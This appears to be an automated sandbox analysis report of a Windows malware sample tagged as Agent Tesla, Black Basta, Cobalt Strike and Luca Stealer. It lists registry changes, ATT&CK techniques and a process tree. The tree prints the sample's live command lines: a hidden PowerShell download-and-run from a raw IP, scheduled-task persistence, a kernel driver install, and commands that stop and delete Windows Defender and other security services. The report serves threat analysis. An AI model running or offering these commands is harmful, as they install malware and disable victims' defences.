Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e6d163131d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yhihb8G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yhihb8G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6526e72213.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ce048e8db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZSECGPC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZSECGPC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i4cwegu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3008	cmd.exe
4736	cmd.exe
2248	netsh.exe
2940	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Yhihb8G.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Yhihb8G.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
808	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5880	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1988	powershell.exe
1988	powershell.exe
2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
2896	rapes.exe
2896	rapes.exe
4520	rapes.exe
4520	rapes.exe
5340	9sWdA2p.exe
5340	9sWdA2p.exe
5340	9sWdA2p.exe
5340	9sWdA2p.exe
5340	9sWdA2p.exe
5340	9sWdA2p.exe
4460	P3Ow4LV.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4460	P3Ow4LV.exe
4640	updater.exe
4680	powershell.exe
4680	powershell.exe
4680	powershell.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4640	updater.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
4064	explorer.exe
2824	e6d163131d.exe
2824	e6d163131d.exe
4064	explorer.exe
4064	explorer.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1348	UZPt0hR.exe
1348	UZPt0hR.exe
1348	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeShutdownPrivilege	2576	powercfg.exe
Token: SeCreatePagefilePrivilege	2576	powercfg.exe
Token: SeShutdownPrivilege	5528	powercfg.exe
Token: SeCreatePagefilePrivilege	5528	powercfg.exe
Token: SeShutdownPrivilege	2736	powercfg.exe
Token: SeCreatePagefilePrivilege	2736	powercfg.exe
Token: SeShutdownPrivilege	5876	powercfg.exe
Token: SeCreatePagefilePrivilege	5876	powercfg.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	5616	powercfg.exe
Token: SeCreatePagefilePrivilege	5616	powercfg.exe
Token: SeShutdownPrivilege	4636	powercfg.exe
Token: SeCreatePagefilePrivilege	4636	powercfg.exe
Token: SeShutdownPrivilege	5384	powercfg.exe
Token: SeCreatePagefilePrivilege	5384	powercfg.exe
Token: SeShutdownPrivilege	4996	powercfg.exe
Token: SeCreatePagefilePrivilege	4996	powercfg.exe
Token: SeLockMemoryPrivilege	4064	explorer.exe
Token: SeDebugPrivilege	5956	Yhihb8G.exe
Token: SeDebugPrivilege	3140	Yhihb8G.exe
Token: SeDebugPrivilege	6064	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeShutdownPrivilege	3748	powercfg.exe
Token: SeCreatePagefilePrivilege	3748	powercfg.exe
Token: SeShutdownPrivilege	6016	powercfg.exe
Token: SeCreatePagefilePrivilege	6016	powercfg.exe
Token: SeShutdownPrivilege	5060	powercfg.exe
Token: SeCreatePagefilePrivilege	5060	powercfg.exe
Token: SeShutdownPrivilege	4012	powercfg.exe
Token: SeCreatePagefilePrivilege	4012	powercfg.exe
Token: SeDebugPrivilege	5632	powershell.exe
Token: SeShutdownPrivilege	2152	powercfg.exe
Token: SeCreatePagefilePrivilege	2152	powercfg.exe
Token: SeShutdownPrivilege	3824	powercfg.exe
Token: SeCreatePagefilePrivilege	3824	powercfg.exe
Token: SeShutdownPrivilege	4736	powercfg.exe
Token: SeCreatePagefilePrivilege	4736	powercfg.exe
Token: SeShutdownPrivilege	3036	powercfg.exe
Token: SeCreatePagefilePrivilege	3036	powercfg.exe
Token: SeDebugPrivilege	6664	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1020 wrote to memory of 2756	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1020 wrote to memory of 2756	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1020 wrote to memory of 2756	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1020 wrote to memory of 3700	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1020 wrote to memory of 3700	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1020 wrote to memory of 3700	1020	2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2756 wrote to memory of 5880	2756	cmd.exe	90
PID 2756 wrote to memory of 5880	2756	cmd.exe	90
PID 2756 wrote to memory of 5880	2756	cmd.exe	90
PID 3700 wrote to memory of 1988	3700	mshta.exe	93
PID 3700 wrote to memory of 1988	3700	mshta.exe	93
PID 3700 wrote to memory of 1988	3700	mshta.exe	93
PID 1988 wrote to memory of 2912	1988	powershell.exe	102
PID 1988 wrote to memory of 2912	1988	powershell.exe	102
PID 1988 wrote to memory of 2912	1988	powershell.exe	102
PID 2912 wrote to memory of 2896	2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE	103
PID 2912 wrote to memory of 2896	2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE	103
PID 2912 wrote to memory of 2896	2912	TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE	103
PID 2896 wrote to memory of 4344	2896	rapes.exe	106
PID 2896 wrote to memory of 4344	2896	rapes.exe	106
PID 2896 wrote to memory of 4344	2896	rapes.exe	106
PID 4344 wrote to memory of 5056	4344	apple.exe	107
PID 4344 wrote to memory of 5056	4344	apple.exe	107
PID 4344 wrote to memory of 5056	4344	apple.exe	107
PID 5056 wrote to memory of 1856	5056	261.exe	109
PID 5056 wrote to memory of 1856	5056	261.exe	109
PID 1856 wrote to memory of 1472	1856	cmd.exe	111
PID 1856 wrote to memory of 1472	1856	cmd.exe	111
PID 1856 wrote to memory of 1472	1856	cmd.exe	111
PID 1472 wrote to memory of 5196	1472	261.exe	112
PID 1472 wrote to memory of 5196	1472	261.exe	112
PID 5196 wrote to memory of 2228	5196	cmd.exe	114
PID 5196 wrote to memory of 2228	5196	cmd.exe	114
PID 5196 wrote to memory of 5040	5196	cmd.exe	115
PID 5196 wrote to memory of 5040	5196	cmd.exe	115
PID 5196 wrote to memory of 808	5196	cmd.exe	116
PID 5196 wrote to memory of 808	5196	cmd.exe	116
PID 5196 wrote to memory of 2488	5196	cmd.exe	117
PID 5196 wrote to memory of 2488	5196	cmd.exe	117
PID 5196 wrote to memory of 5656	5196	cmd.exe	118
PID 5196 wrote to memory of 5656	5196	cmd.exe	118
PID 5196 wrote to memory of 5192	5196	cmd.exe	119
PID 5196 wrote to memory of 5192	5196	cmd.exe	119
PID 5196 wrote to memory of 2276	5196	cmd.exe	120
PID 5196 wrote to memory of 2276	5196	cmd.exe	120
PID 5196 wrote to memory of 5272	5196	cmd.exe	121
PID 5196 wrote to memory of 5272	5196	cmd.exe	121
PID 5196 wrote to memory of 4892	5196	cmd.exe	122
PID 5196 wrote to memory of 4892	5196	cmd.exe	122
PID 5196 wrote to memory of 1980	5196	cmd.exe	123
PID 5196 wrote to memory of 1980	5196	cmd.exe	123
PID 5196 wrote to memory of 2284	5196	cmd.exe	124
PID 5196 wrote to memory of 2284	5196	cmd.exe	124
PID 5196 wrote to memory of 2252	5196	cmd.exe	125
PID 5196 wrote to memory of 2252	5196	cmd.exe	125
PID 5196 wrote to memory of 2708	5196	cmd.exe	126
PID 5196 wrote to memory of 2708	5196	cmd.exe	126
PID 5196 wrote to memory of 5236	5196	cmd.exe	127
PID 5196 wrote to memory of 5236	5196	cmd.exe	127
PID 5196 wrote to memory of 6012	5196	cmd.exe	128
PID 5196 wrote to memory of 6012	5196	cmd.exe	128
PID 5196 wrote to memory of 1772	5196	cmd.exe	129
PID 5196 wrote to memory of 1772	5196	cmd.exe	129
PID 5196 wrote to memory of 2356	5196	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-03_db91f36bd4f08a8f50250c161c883972_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn zj00wmaP9Ht /tr "mshta C:\Users\Admin\AppData\Local\Temp\FsqAYJOtl.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn zj00wmaP9Ht /tr "mshta C:\Users\Admin\AppData\Local\Temp\FsqAYJOtl.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5880
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\FsqAYJOtl.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Users\Admin\AppData\Local\TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE
      "C:\Users\Admin\AppData\Local\TempEK3KR9X4LUS8Z5COMECCTD1JEECVGZMU.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2896
      - C:\Users\Admin\AppData\Local\Temp\10429160101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429160101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2B51.tmp\2B52.tmp\2B53.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1472
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CB8.tmp\2CB9.tmp\2CBA.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:5196
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:2228
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5040
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:808
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2488
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5656
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5192
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2276
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5272
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1980
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2284
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2252
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2708
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5236
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:6012
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:1772
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:316
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5560
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1316
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:836
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4340
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5572
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5896
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1528
